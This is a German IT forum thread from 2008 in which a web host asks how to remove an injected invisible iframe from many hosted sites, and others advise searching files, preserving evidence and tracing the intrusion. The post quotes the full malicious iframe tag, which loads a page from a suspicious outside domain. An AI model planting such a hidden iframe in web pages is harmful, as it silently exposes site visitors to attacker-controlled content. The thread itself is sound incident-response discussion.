Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Auf dem Webserver hat sich ein gefährlicher Code eingeschlichen

Mitglied: beaxx

beaxx (Level 1) - Jetzt verbinden

31.03.2008, aktualisiert 15:38 Uhr, 3686 Aufrufe, 7 Kommentare

Hallo,

Auf unseren Webserver hat sich ein gefährlicher Code eingeschlichen

<iframe src=http://www.haola123123.com/hkeraone/hker.htm widht=0 height=0></iframe>

jetzt meine Frage

Wir hosten mehrer Website wie lösche ich dieses Iframe von allen Websiten die wir hosten in einen zug oder bleibt mir nichts anderes über als alle Websiten durchgehn und sie händisch rauslöschen?? hat da wer schon erfahren

frage zwei
kennt dieses iframe wer bzw. was für einen schaden richtet es an? bislang hab ich nicht wirklich was drüber gefunden


danke in voraus

mfg
Mitglied: 60730
31.03.2008 um 10:00 Uhr
Frage 3:
Was ist das für ein Webserver und 3b) wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit Windows Boardsuche.

Nicht einfach löschen, sondern rausfinden, wie er auf dein System gekommen ist - das ist deine Aufgabe!
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 10:08 Uhr
Frage 3:
Was ist das für ein Webserver und 3b)
wie ist er da drauf gekommen?

Entweder manuell mit Grep suchen oder mit
Windows Boardsuche.

Nicht einfach löschen, sondern
rausfinden, wie er auf dein System gekommen
ist - das ist deine Aufgabe!

Windows 2000 Server
tja das ist eine gute frage muß von ausserhalb irgendwie draufgekommen sein

tja herausfinden ist so eine sache der code gehört dringend von allen websiten entfernd dann kann ich mich drum kümmern wie er draufgekommen ist bei einer manuellen löschung sitz ich einen tag dabei
Bitte warten ..
Mitglied: Gahmuret
31.03.2008 um 10:18 Uhr
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine Kopie der infizierten Seiten erstellen um sie zu analysieren.
Spiel doch einfach die Sicherung der Webseiten über die infizierten.

Schöne Grüße
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 10:29 Uhr
Hallo beaxx,

Timo hat Recht. Du solltest zumindest eine
Kopie der infizierten Seiten erstellen um sie
zu analysieren.
Spiel doch einfach die Sicherung der
Webseiten über die infizierten.

Schöne Grüße

Kopie hab ich schon erstellt ich werd mich nachher auch dann ausführlich beschäftigen was der überhaupt macht nur wie ich schon gesagt hab gehört er dringend von allen websiten so schnell wie möglich entfernd
tja die sicherung einspielen an das hab ich auch schon gedacht nur ich dachte es gäbe eine einfachere lösung weils eh immer der selbe code ist der zum entfernen ist

viele grüße
Bitte warten ..
Mitglied: 60730
31.03.2008 um 10:39 Uhr
ich dachte es
gäbe eine einfachere lösung weils
eh immer der selbe code ist der zum entfernen
ist

viele grüße

Hi,

geh mit dem Explorer auf den Webroot und drücke [F3] suchen:

Nach dateien suchen, deren inhalt "widht=0 height=0></iframe>" ist und durch den ganzen Baum suchen lassen, die Fundstellen ansehen. Wenn "nur" hker.htm darunter ist - diese htm. Datei umbenennen, dann "passiert" nicht mehr viel. Wenn du Sie löscht, kannst du nicht mehr rausfinden, wer und wann die Datei raufgespielt hat.

Nun rausfinden, wann diese Datei auf dem Server gelandet ist und ganz genau nachforschen, was wer und wie diese Datei auf die Maschine gekommen ist.
Dann kannste die auch löschen.
Bitte warten ..
Mitglied: beaxx
31.03.2008 um 14:31 Uhr
Hallo,

sodale jetzt hab ich nochmal nachgeschaut mit sicherung einspielen is nicht leider ist die letzte sicherung schon zu lange aus das das einspielen keinen sinn macht

ich hab mal eine website kopiert um nachher nachforschungen anzustellen wie was wo das herkommt

jetzt bräucht ich nur ein tool wie ich denn code von denn restlichen websiten weg bekomme
es sind html , aspx vb und dll datein betroffen anonst werd ich wohl eine woche brauchen bis ich denn code von jeder website händisch entferne

bin für jeden hinweis dankbar

mfg
Bitte warten ..
Mitglied: 60730
31.03.2008 um 15:38 Uhr
Hi,

du liesst offensichtlich meine Postings nicht richtig?

Wenn du die Datei kopierst, wer hat die Datei erzeugt? Richtig du....
Von daher wird das dann mit dem Nachforschen unmöglich.

Ist es immer die gleiche Datei - die den Iframe ausmacht?

Auch auf die Gefahr, dass du möglicherweise auch diesen Post nicht verstehst unter:

http://www.inforapid.de/html/srdownload.htm

diesem Link gibts ein Such und Ersetz Werkzeug.

Auf jeden Fall vorher eine Datensicherung machen, wenigstens jetzt

Bevor du die Einbruchsquelle nicht gefunden hast, ist nicht sicher - oder doch, das der Kram ratzfatz wieder auf dem System landet.
Bitte warten ..
Neue Wissensbeiträge
iOS
WatchChat für Whatsapp
Tipp von Criemo vor 2 TageniOS3 Kommentare

Ziemlich coole App für WhatsApp User in Verbindung mit der Apple Watch. Gibts für iOS sowohl als auch für ...

iOS
IOS hat nen Cursor !!!
Tipp von Criemo vor 3 TageniOS5 Kommentare

Nette Funktion im iOS. iPhone-Mauszeiger aktivieren „Nichts ist nerviger, als bei einem Tippfehler zu versuchen, den iOS-Cursor an die ...

Off Topic
Avengers 4: Endgame - Erster Trailer
Information von Frank vor 5 TagenOff Topic2 Kommentare

Ich weiß es ist Off Topic, aber ich freue mich auf diesen Film und vielleicht geht es anderen hier ...

Webbrowser
Microsoft bestätigt Edge mit Chromium-Kern
Information von Frank vor 5 TagenWebbrowser5 Kommentare

Microsoft hat nun in seinem Blog bestätigt, dass die nächste Edge Version kein EdgeHTML mehr für die Darstellung benutzen ...

Heiß diskutierte Inhalte
Hosting & Housing
VMware VM mit über 1TB RAM für S4HANA
gelöst Frage von Leo-leHosting & Housing24 Kommentare

Hallo zusammen, wer hat Erfahrng und kann mir einen Tipp zum sizing von S4HANA Systemen geben? Wir möchten, zunächst ...

LAN, WAN, Wireless
WLAN und Ausmessung - Eine Glaubensfrage?
Frage von ptr2brainLAN, WAN, Wireless23 Kommentare

Liebe Experten, als Sys-Admin habe ich mir schon öfter die Frage gestellt, ob es sich beim Thema WLAN und ...

Drucker und Scanner
SW-Laserdrucker mit sechs Papierfächern gesucht
Frage von MOS6581Drucker und Scanner19 Kommentare

Moin, zur Abwechslung mal eine sonderbare Anforderung :) Ich suche einen S/W Laserdrucker (kein MFP), der sechs Papierfächer bzw. ...

Virtualisierung
Gebrauchte Server Hardware als Virtualisierungs-"Spielwiese"?
Frage von NixVerstehenVirtualisierung19 Kommentare

Einen wunderschönen guten Morgen zusammen, ich möchte mich gerne etwas tiefer mit dem Thema Virtualisierung beschäftigen und dazu ein ...